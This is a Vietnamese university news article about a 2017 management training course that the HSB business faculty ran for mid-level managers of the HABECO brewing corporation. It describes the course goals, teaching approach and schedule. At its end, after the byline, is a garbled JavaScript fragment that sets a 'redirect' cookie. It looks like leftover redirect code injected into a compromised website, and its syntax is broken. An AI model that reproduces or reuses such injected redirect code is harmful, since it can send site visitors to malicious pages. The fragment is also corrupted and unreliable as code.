Habeco1 Ngày 3/11/2017, Khoa Quản trị và Kinh doanh khai giảng Chương trình đào tạo “Nâng cao năng lực quản lý cho cán bộ cấp trung” của Tổng công ty cổ phần Bia- Rượu- Nước giải khát Hà Nội (HABECO).

Chương trình đào tạo Khoa Quản trị và Kinh doanh (HSB) thiết kế dành cho đối tượng học viên là các cán bộ cấp trung mới bổ nhiệm từ năm 2016 và các cán bộ được bổ nhiệm trước năm 2016 nhưng còn thiếu một số module kỹ năng cơ bản về quản trị.

Habeco1

Các cán bộ quản lý cấp trung của HABECO tới tham dự chương trình đào tạo
Khóa đào tạo được tổ chức nhằm đạt được 02 mục tiêu chính:
– Nâng cao kiến thức và kinh nghiệm quản lý thông qua việc hiểu rõ vai trò, trách nhiệm của người quản lý; đặc thù mô hình tổ chức và quản lý doanh nghiệp trên thế giới nói chung và của hệ thống HABECO nói riêng; lập kế hoạch và tổ chức quản lý hiệu quả; quản trị nhân sự và phát triển nguồn nhân lực;
– Phát triển và hoàn thiện các kỹ năng cần thiết mà người quản lý cấp trung phải có: Kỹ năng truyền thông, điều hành cuộc họp, kỹ năng quản lý cảm xúc, ứng phó với căng thẳng.

Habeco-2

PGS.TS Nguyễn Ngọc Thắng – Phó chủ nhiệm Khoa phát biểu tại lễ khai giảng
Phương pháp giảng dạy trong khóa là phương pháp 2 chiều, kết hợp giữa lý thuyết và thảo luận chia sẻ kinh nghiệm, giảng dạy theo phương pháp hai chiều, lấy học viên làm trung tâm. Học viên được khuyến khích trao đổi kinh nghiệm và đưa ra những tình huống thực tế làm ví dụ tốt cho bài học. Các giảng viên giàu kinh nghiệm sẽ cung cấp những thông tin có tính chất hỗ trợ, nâng cao chuyên môn và kỹ năng của học viên. Giảng viên đóng vai trò là người cố vấn trong các tình huống, bài tập được thảo luận trong khoá học.

Habeco-3

Các học viên sôi nổi thảo luận trong giờ học
PGS.TS.Nguyễn Ngọc Thắng – Phó chủ nhiệm Khoa cho biết, đây là chương trình đào tạo về quản trị được HSB thiết kế dành riêng cho cấp cán bộ nguồn cho đến cán bộ cấp cao của Tổng công ty cổ phần Bia – Rượu – Nước giải khát Hà Nội, liên tục được đổi mới và triển khai thường niên.
Chương trình lần này diễn ra 2 đợt, đợt 1 từ 3 – 5/11/2017, đợt 2 từ 10 – 11/11/2017.

                                                                                                                                      Ngân Hà

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}